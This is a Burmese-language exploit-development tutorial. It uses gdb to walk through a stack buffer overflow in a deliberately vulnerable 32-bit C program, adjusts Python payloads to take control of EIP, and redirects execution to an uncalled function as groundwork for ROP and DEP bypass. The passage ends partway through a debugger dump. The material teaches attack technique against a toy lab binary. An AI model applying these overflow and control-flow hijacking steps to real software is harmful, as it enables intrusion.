0x0A – Before you begin ROP

0x09 တုန္းကေျပာခဲ့သလိုပါပဲ ။ DEP Bypass လုပ္ဖို႕အတြက္ အဓိကထားျပီး ROP နည္းကိုသံုးျကတယ္။

DEP ( Data Execution Prevention )

Stack တို႕ Heap တို႕မွာ Data ပဲသိမ္းလို႕ရမယ္။ Execute ေပးမလုပ္ဘူး။ Shellcode ကို stack ထဲကိုထည့္တဲ့အခါ အလုပ္လုပ္ေတာ့မွာမဟုတ္ပါဘူး ။ ဒါေၾကာင့္ ROP ကို သံုးျပီး Bypass လုပ္ဖို႕လိုအပ္လာပါတယ္။

Before you begin ROP

ROP ကိုမေလ့လာခင္မွာ Function Call ေတြ RET ေတြဘယ္လိုအလုပ္လုပ္တယ္ဆိုတာကိုအရင္ဆံုးသိထားဖို႕လိုကပါတယ္။ ဒါေၾကာင့္ Debugging with gdb part 2 ကိုနားလည္ထားရင္ပိုအဆင္ေျပပါလိမ့္မယ္။

ဒီေတာ့ က်ေနာ္တို႕စေလ့လာဖို႕အတြက္ ROP ကိုနားလည္ေအာင္အရင္ဆံုးၾကိဳးစားၾကမယ္။က်ေနာ္တို႕ရဲ႕အဓိက လုပ္ရမယ့္အရာက EIP မွာ stack ကိုျပန္မသြားခ်င္တာလို႕ေျပာလို႕ရတယ္။ ဘာေၾကာင့္လဲဆို stack မွာ အလုပ္လုပ္မွာမဟုတ္လို႕ျဖစ္တယ္။ ဒီေတာ့ အဓိကလုိအပ္ခ်က္ stack ကိုျပန္မသြားခ်င္ရင္ shellcode ကိုဘယ္မွာထည့္ျပီး ဘယ္ကိုျပန္သြားမလဲဆိုတာေလးတစ္ခုေပၚလာတယ္။ ဟုတ္ျပီ အဲ့လိုသြားခ်င္တဲ့ေနရာကိုက်ေနာ္တို႕ဘယ္လိုသြားလို႕ရနိုင္မလဲ ? ဒီေတာ့ အရင္ဆံုး ROP မလုပ္ခင္ က်ေနာ္တို႕ သြားခ်င္တဲ့ေနရာကိုေရာက္ေအာင္သြားၾကမယ္။

ROP Chains ဆိုတာကိုေသခ်ာနားလည္ေအာင္ရည္ရြယ္ပါတယ္။ C နဲ႕ေရးလိုက္မယ္ ။

#include <stdio.h>
int add(int a,int b)
{
        return a=a+b;
}
int main()
{
        char buffer[16];
        gets(buffer);
}

ရွင္းတယ္ main function မွာ overflow vulnerable ရွိတယ္။ add function က ျပန္ေခၚထားျခင္းမရွိဘူး ။ ဒါေပမဲ့ Overflow ရွိတဲ့ အတြက္အဲဒီကို Parameter ေတြနဲ႕တကြ က်ေနာ္တို႕ အေရာက္သြားၾကမယ္။ ဒီလိုသြားနိုင္ရင္ ေကာင္းေကာင္းနားလည္ျပီလို႕ယူဆလို႕ရပါတယ္။

Compile လုပ္တဲ့အခါ -zexecstack ကို မထည့္ပါနဲ႕။

 gcc -m32 -fno-stack-protector -o rop_u rop_u.c

Overflow ကိုအရင္ analysis လုပ္လိုက္မယ္။ offset ဘာညာ ေပါ့ ။

root@exploitdev:~/ROP# gdb rop_u
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from rop_u...(no debugging symbols found)...done.
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
   0x08048419 <+0>:     lea    ecx,[esp+0x4]
   0x0804841d <+4>:     and    esp,0xfffffff0
   0x08048420 <+7>:     push   DWORD PTR [ecx-0x4]
   0x08048423 <+10>:    push   ebp
   0x08048424 <+11>:    mov    ebp,esp
   0x08048426 <+13>:    push   ecx
   0x08048427 <+14>:    sub    esp,0x14
   0x0804842a <+17>:    sub    esp,0xc
   0x0804842d <+20>:    lea    eax,[ebp-0x18]
   0x08048430 <+23>:    push   eax
   0x08048431 <+24>:    call   0x80482e0 <gets@plt>
   0x08048436 <+29>:    add    esp,0x10
   0x08048439 <+32>:    mov    eax,0x0
   0x0804843e <+37>:    mov    ecx,DWORD PTR [ebp-0x4]
   0x08048441 <+40>:    leave
   0x08048442 <+41>:    lea    esp,[ecx-0x4]
   0x08048445 <+44>:    ret
End of assembler dump.

ret မွာရပ္မယ္။

(gdb) break *main+44
Breakpoint 1 at 0x8048445

gets မလာခင္မွာရပ္မယ္။

(gdb) break *main+24
Breakpoint 2 at 0x8048431

ထံုးစံအတိုင္း hook-stop သတ္မွတ္မယ္။

(gdb) define hook-stop
Type commands for definition of "hook-stop".
End with a line saying just "end".
>x/32wx $esp
>x/2i $eip
>info registers
>end

run လုိက္မယ္။

(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/ROP/rop_u
0xffffd640:     0xffffd650      0x0000001f      0xf7e47830      0x0804849b
0xffffd650:     0x00000001      0xffffd714      0xffffd71c      0x08048471
0xffffd660:     0xf7fc93dc      0xffffd680      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0x6255e65e      0x5bd3084e      0x00000000
=> 0x8048431 <main+24>: call   0x80482e0 <gets@plt>
   0x8048436 <main+29>: add    esp,0x10
eax            0xffffd650       -10672
ecx            0xffffd680       -10624
edx            0xffffd6a4       -10588
ebx            0x0      0
esp            0xffffd640       0xffffd640
ebp            0xffffd668       0xffffd668
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048431        0x8048431 <main+24>
eflags         0x296    [ PF AF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

Breakpoint 2, 0x08048431 in main ()

အခုလာမွာက gets ကိုေခၚေတာ့မွာျဖစ္တယ္။ ခုခ်ိန္ stack ကဘာျဖစ္ေနလဲလဲျမင္ေနရပါတယ္ ။ input ထည့္လိုက္ေတာ့မယ္။

(gdb) ni
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH
0x46464642:     Error while running hook_stop:
Cannot access memory at address 0x46464642

Breakpoint 1, 0x08048445 in main ()
(gdb) x/32wx $esp
0x46464642:     Cannot access memory at address 0x46464642

ျပသနာကေတာ့ က်ေနာ္တို႕ esp ကိုက 46 ေတြျဖစ္ေနျပီ

(gdb) info registers
eax            0x0      0
ecx            0x46464646       1179010630
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0x46464642       0x46464642
ebp            0x47474747       0x47474747
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048445        0x8048445 <main+44>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

ebp က 47 တဲ့ ။ ဒါကို ရေအာင္ဘယ္လိုလုပ္ၾကမလဲ ?

esp address ကမသိေတာ့ RET က eip အျဖစ္ stack ရဲ႕အေပၚဆံုးကဟာကိုယူမွာမဟုတ္လား? အဲမွာ esp က မဟုတ္ကဟုတ္ကေတြျဖစ္ေနေတာ့ ျပသနာတက္တာေပါ့။ အဲဒါဆိုဟုတ္သြားေအာင္လုပ္မယ္ေလ။

Input ကို overflow တဲ့ထိမထည့္ေတာ့ဘူး

(gdb) ni
AAAABBBBCCCCDDDDEEEE
0xffffd5fc:     0x0000000a      0x00000000      0xf7e1d538      0xffffd620
0xffffd60c:     0x0804823b      0xf7fe87eb      0x00000000      0xf7fc9000
0xffffd61c:     0xffffd650      0xffffd668      0xf7feeff0      0xf7e7789b
0xffffd62c:     0x00000000      0xf7fc9000      0xf7fc9000      0xffffd668
0xffffd63c:     0x08048436      0xffffd650      0x0000001f      0xf7e47830
0xffffd64c:     0x0804849b      0x41414141      0x42424242      0x43434343
0xffffd65c:     0x44444444      0x45454545      0xffffd600      0x00000000
0xffffd66c:     0xf7e31637      0xf7fc9000      0xf7fc9000      0x00000000
=> 0x8048445 <main+44>: ret
   0x8048446:   xchg   ax,ax
eax            0x0      0
ecx            0xffffd600       -10752
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd5fc       0xffffd5fc
ebp            0x0      0x0
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048445        0x8048445 <main+44>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

Breakpoint 1, 0x08048445 in main ()

အဓိကျပသနာကိုက်ေနာ္တို႕သိလိုက္ရမယ္။ pop ecx နဲ႕ေနာက္ဆံုး lea ျပန္လုပ္တဲ့ဟာေၾကာင့္ ခုလိုျဖစ္ရတာေပါ့ ။

အခုကေတာ့ အေကာင္းတိုင္းရွိေနေသးတယ္ ။ esp ျပန္ျဖစ္မယ့္ဟာ

0xffffd600

ဆက္ run ၾကည့္လိုက္

(gdb) ni
0xffffd600:     0x00000000      0xf7e1d538      0xffffd620      0x0804823b
0xffffd610:     0xf7fe87eb      0x00000000      0xf7fc9000      0xffffd650
0xffffd620:     0xffffd668      0xf7feeff0      0xf7e7789b      0x00000000
0xffffd630:     0xf7fc9000      0xf7fc9000      0xffffd668      0x08048436
0xffffd640:     0xffffd650      0x0000001f      0xf7e47830      0x0804849b
0xffffd650:     0x41414141      0x42424242      0x43434343      0x44444444
0xffffd660:     0x45454545      0xffffd600      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
=> 0xa: Error while running hook_stop:
Cannot access memory at address 0xa
0x0000000a in ?? ()

က်ေနာ္တို႕ ပထမ input တုန္းက အဲဒီ address ကိုပါအုပ္သြားေတာ့ မသိေတာ့တာျဖစ္တယ္။ အခုသိျပီဆုိေတာ့

0xffffd650: 0x41414141 0x42424242 0x43434343 0x44444444 
0xffffd660: 0x45454545

ဒီေကာင္ကို stack ရဲ႕အေပၚဆံုးျဖစ္ေအာင္ မလုပ္နိုင္ဘူးလား?

import struct
offset="AAAABBBBCCCCDDDDEEEE"
newesp=struct.pack("I",0xffffd650)
print offset+newesp

gdb မွာ run လို႕ရေအာင္ လုပ္မယ္။

python rop.py > rop.txt

Run မယ္ဗ်ာ

(gdb) r < rop.txt
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/ROP/rop_u < rop.txt
0xffffd640:     0xffffd650      0x0000001f      0xf7e47830      0x0804849b
0xffffd650:     0x00000001      0xffffd714      0xffffd71c      0x08048471
0xffffd660:     0xf7fc93dc      0xffffd680      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0x1e925b35      0x2714b525      0x00000000
=> 0x8048431 <main+24>: call   0x80482e0 <gets@plt>
   0x8048436 <main+29>: add    esp,0x10
eax            0xffffd650       -10672
ecx            0xffffd680       -10624
edx            0xffffd6a4       -10588
ebx            0x0      0
esp            0xffffd640       0xffffd640
ebp            0xffffd668       0xffffd668
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048431        0x8048431 <main+24>
eflags         0x296    [ PF AF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

Breakpoint 2, 0x08048431 in main ()

input ဝင္လာေအာင္ ဆက္ run မယ္

(gdb) ni
0xffffd64c:     0x0804849b      0x41414141      0x42424242      0x43434343
0xffffd65c:     0x44444444      0x45454545      0xffffd650      0x00000000
0xffffd66c:     0xf7e31637      0xf7fc9000      0xf7fc9000      0x00000000
0xffffd67c:     0xf7e31637      0x00000001      0xffffd714      0xffffd71c
0xffffd68c:     0x00000000      0x00000000      0x00000000      0xf7fc9000
0xffffd69c:     0xf7ffdc04      0xf7ffd000      0x00000000      0xf7fc9000
0xffffd6ac:     0xf7fc9000      0x00000000      0x1e925b35      0x2714b525
0xffffd6bc:     0x00000000      0x00000000      0x00000000      0x00000001
=> 0x8048445 <main+44>: ret
   0x8048446:   xchg   ax,ax
eax            0x0      0
ecx            0xffffd650       -10672
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd64c       0xffffd64c
ebp            0x0      0x0
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048445        0x8048445 <main+44>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

Breakpoint 1, 0x08048445 in main ()

0x0804849b ဒါၾကီးျဖစ္ေနပါလား ဒီထက္ပိုျပီး debugging လုပ္ၾကည့္ဖို႕လိုျပီ

leave လုပ္ျပီးတဲ့အခါမွာ LEA ျပန္လုပ္တယ္။ အဲဒါက ecx-0x4 ဆိုတာကိုေတြ႕မယ္

lea    esp,[ecx-0x4]

ecx ထဲမွာကက်ေနာ္တို႕ထည့္ခဲ့တဲ့ 650 ရွိတယ္။ ဒါကို နွုတ္လဲနွဳတ္လိုက္ေရာ္ 41 ေတြထက္ေရွ႕တစ္ခုကိုေရာက္သြားတယ္။

(gdb) x $ecx-0x4
   0xffffd64c:  fwait

ဒါကိုသိရင္ လုပ္ရမွာတစ္ခုပဲရွိေတာ့တယ္။ သူကနွုတ္မွာေလ ။ကိုယ္ကေပါင္းေပးလိုက္ယံုေပါ့။

import struct
offset="AAAABBBBCCCCDDDDEEEE"
newesp=struct.pack("I",0xffffd650+0x4)
padding="GGGGHHHHIIIIJJJJKKKK"
print offset+newesp+padding

ျပန္ၾကည့္လိုက္မယ္ gdb မွာ

(gdb) r < rop.txt
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/ROP/rop_u < rop.txt
0xffffd640:     0xffffd650      0x0000001f      0xf7e47830      0x0804849b
0xffffd650:     0x00000001      0xffffd714      0xffffd71c      0x08048471
0xffffd660:     0xf7fc93dc      0xffffd680      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xe488a6a9      0xdd0e48b9      0x00000000
=> 0x8048431 <main+24>: call   0x80482e0 <gets@plt>
   0x8048436 <main+29>: add    esp,0x10
eax            0xffffd650       -10672
ecx            0xffffd680       -10624
edx            0xffffd6a4       -10588
ebx            0x0      0
esp            0xffffd640       0xffffd640
ebp            0xffffd668       0xffffd668
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048431        0x8048431 <main+24>
eflags         0x296    [ PF AF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

Breakpoint 2, 0x08048431 in main ()
(gdb) ni
0xffffd640:     0xffffd650      0x0000001f      0xf7e47830      0x0804849b
0xffffd650:     0x41414141      0x42424242      0x43434343      0x44444444
0xffffd660:     0x45454545      0xffffd654      0x47474747      0x48484848
0xffffd670:     0x49494949      0x4a4a4a4a      0x4b4b4b4b      0xf7e31600
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xe488a6a9      0xdd0e48b9      0x00000000
=> 0x8048436 <main+29>: add    esp,0x10
   0x8048439 <main+32>: mov    eax,0x0
eax            0xffffd650       -10672
ecx            0xf7fc95a0       -134441568
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd640       0xffffd640
ebp            0xffffd668       0xffffd668
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048436        0x8048436 <main+29>
eflags         0x246    [ PF ZF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

Breakpoint 3, 0x08048436 in main ()
(gdb)
0xffffd650:     0x41414141      0x42424242      0x43434343      0x44444444
0xffffd660:     0x45454545      0xffffd654      0x47474747      0x48484848
0xffffd670:     0x49494949      0x4a4a4a4a      0x4b4b4b4b      0xf7e31600
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xe488a6a9      0xdd0e48b9      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x8048439 <main+32>: mov    eax,0x0
   0x804843e <main+37>: mov    ecx,DWORD PTR [ebp-0x4]
eax            0xffffd650       -10672
ecx            0xf7fc95a0       -134441568
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd668       0xffffd668
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048439        0x8048439 <main+32>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x08048439 in main ()
(gdb)
0xffffd650:     0x41414141      0x42424242      0x43434343      0x44444444
0xffffd660:     0x45454545      0xffffd654      0x47474747      0x48484848
0xffffd670:     0x49494949      0x4a4a4a4a      0x4b4b4b4b      0xf7e31600
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xe488a6a9      0xdd0e48b9      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x804843e <main+37>: mov    ecx,DWORD PTR [ebp-0x4]
   0x8048441 <main+40>: leave
eax            0x0      0
ecx            0xf7fc95a0       -134441568
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd668       0xffffd668
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x804843e        0x804843e <main+37>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x0804843e in main ()
(gdb)
0xffffd650:     0x41414141      0x42424242      0x43434343      0x44444444
0xffffd660:     0x45454545      0xffffd654      0x47474747      0x48484848
0xffffd670:     0x49494949      0x4a4a4a4a      0x4b4b4b4b      0xf7e31600
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xe488a6a9      0xdd0e48b9      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x8048441 <main+40>: leave
   0x8048442 <main+41>: lea    esp,[ecx-0x4]
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd668       0xffffd668
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048441        0x8048441 <main+40>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x08048441 in main ()
(gdb)
0xffffd66c:     0x48484848      0x49494949      0x4a4a4a4a      0x4b4b4b4b
0xffffd67c:     0xf7e31600      0x00000001      0xffffd714      0xffffd71c
0xffffd68c:     0x00000000      0x00000000      0x00000000      0xf7fc9000
0xffffd69c:     0xf7ffdc04      0xf7ffd000      0x00000000      0xf7fc9000
0xffffd6ac:     0xf7fc9000      0x00000000      0xe488a6a9      0xdd0e48b9
0xffffd6bc:     0x00000000      0x00000000      0x00000000      0x00000001
0xffffd6cc:     0x08048310      0x00000000      0xf7feeff0      0xf7fe9880
0xffffd6dc:     0xf7ffd000      0x00000001      0x08048310      0x00000000
=> 0x8048442 <main+41>: lea    esp,[ecx-0x4]
   0x8048445 <main+44>: ret
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd66c       0xffffd66c
ebp            0x47474747       0x47474747
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048442        0x8048442 <main+41>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x08048442 in main ()
(gdb)
0xffffd650:     0x41414141      0x42424242      0x43434343      0x44444444
0xffffd660:     0x45454545      0xffffd654      0x47474747      0x48484848
0xffffd670:     0x49494949      0x4a4a4a4a      0x4b4b4b4b      0xf7e31600
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xe488a6a9      0xdd0e48b9      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x8048445 <main+44>: ret
   0x8048446:   xchg   ax,ax
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0x47474747       0x47474747
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048445        0x8048445 <main+44>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

Breakpoint 1, 0x08048445 in main ()
(gdb)
0xffffd654:     0x42424242      0x43434343      0x44444444      0x45454545
0xffffd664:     0xffffd654      0x47474747      0x48484848      0x49494949
0xffffd674:     0x4a4a4a4a      0x4b4b4b4b      0xf7e31600      0x00000001
0xffffd684:     0xffffd714      0xffffd71c      0x00000000      0x00000000
0xffffd694:     0x00000000      0xf7fc9000      0xf7ffdc04      0xf7ffd000
0xffffd6a4:     0x00000000      0xf7fc9000      0xf7fc9000      0x00000000
0xffffd6b4:     0xe488a6a9      0xdd0e48b9      0x00000000      0x00000000
0xffffd6c4:     0x00000000      0x00000001      0x08048310      0x00000000
=> 0x41414141:  Error while running hook_stop:
Cannot access memory at address 0x41414141
0x41414141 in ?? ()

Woot ! ေနာက္ဆံုးေတာ့ EIP ကို control လုပ္နိုင္သြားျပီ 😀

add function ကိုျမန္ျမန္လစ္ၾကမယ္။ parameter ၂ ခုရွိေသးတယ္ေနာ္ ။

add function ရဲ႕ address ကိုၾကည့္မယ္

(gdb) disas add
Dump of assembler code for function add:
   0x0804840b <+0>:     push   ebp
   0x0804840c <+1>:     mov    ebp,esp
   0x0804840e <+3>:     mov    eax,DWORD PTR [ebp+0xc]
   0x08048411 <+6>:     add    DWORD PTR [ebp+0x8],eax
   0x08048414 <+9>:     mov    eax,DWORD PTR [ebp+0x8]
   0x08048417 <+12>:    pop    ebp
   0x08048418 <+13>:    ret
End of assembler dump.

0x0804840b 😉

import struct
addfunction=struct.pack("I",0x0804840b)
firstparam=struct.pack("I",0x00000002)
secondparam=struct.pack("I",0x00000003)
offset="DDDDEEEE"
newesp=struct.pack("I",0xffffd650+0x4)
padding="GGGGHHHHIIIIJJJJKKKK"
print addfunction+firstparam+secondparam+offset+newesp+padding

ready ဆိုရင္ ဟုတ္မဟုတ္ၾကည့္မယ္။

(gdb) r < rop.txt
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/ROP/rop_u < rop.txt
0xffffd640:     0xffffd650      0x0000001f      0xf7e47830      0x0804849b
0xffffd650:     0x00000001      0xffffd714      0xffffd71c      0x08048471
0xffffd660:     0xf7fc93dc      0xffffd680      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xc1bf2a5e      0xf839c44e      0x00000000
=> 0x8048431 <main+24>: call   0x80482e0 <gets@plt>
   0x8048436 <main+29>: add    esp,0x10
eax            0xffffd650       -10672
ecx            0xffffd680       -10624
edx            0xffffd6a4       -10588
ebx            0x0      0
esp            0xffffd640       0xffffd640
ebp            0xffffd668       0xffffd668
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048431        0x8048431 <main+24>
eflags         0x296    [ PF AF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

Breakpoint 2, 0x08048431 in main ()
(gdb) ni
0xffffd640:     0xffffd650      0x0000001f      0xf7e47830      0x0804849b
0xffffd650:     0x0804840b      0x00000002      0x00000003      0x44444444
0xffffd660:     0x45454545      0xffffd654      0x47474747      0x48484848
0xffffd670:     0x49494949      0x4a4a4a4a      0x4b4b4b4b      0xf7e31600
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xc1bf2a5e      0xf839c44e      0x00000000
=> 0x8048436 <main+29>: add    esp,0x10
   0x8048439 <main+32>: mov    eax,0x0
eax            0xffffd650       -10672
ecx            0xf7fc95a0       -134441568
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd640       0xffffd640
ebp            0xffffd668       0xffffd668
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048436        0x8048436 <main+29>
eflags         0x246    [ PF ZF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

Breakpoint 3, 0x08048436 in main ()
(gdb)
0xffffd650:     0x0804840b      0x00000002      0x00000003      0x44444444
0xffffd660:     0x45454545      0xffffd654      0x47474747      0x48484848
0xffffd670:     0x49494949      0x4a4a4a4a      0x4b4b4b4b      0xf7e31600
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xc1bf2a5e      0xf839c44e      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x8048439 <main+32>: mov    eax,0x0
   0x804843e <main+37>: mov    ecx,DWORD PTR [ebp-0x4]
eax            0xffffd650       -10672
ecx            0xf7fc95a0       -134441568
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd668       0xffffd668
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048439        0x8048439 <main+32>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x08048439 in main ()
(gdb)
0xffffd650:     0x0804840b      0x00000002      0x00000003      0x44444444
0xffffd660:     0x45454545      0xffffd654      0x47474747      0x48484848
0xffffd670:     0x49494949      0x4a4a4a4a      0x4b4b4b4b      0xf7e31600
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xc1bf2a5e      0xf839c44e      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x804843e <main+37>: mov    ecx,DWORD PTR [ebp-0x4]
   0x8048441 <main+40>: leave
eax            0x0      0
ecx            0xf7fc95a0       -134441568
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd668       0xffffd668
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x804843e        0x804843e <main+37>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x0804843e in main ()
(gdb)
0xffffd650:     0x0804840b      0x00000002      0x00000003      0x44444444
0xffffd660:     0x45454545      0xffffd654      0x47474747      0x48484848
0xffffd670:     0x49494949      0x4a4a4a4a      0x4b4b4b4b      0xf7e31600
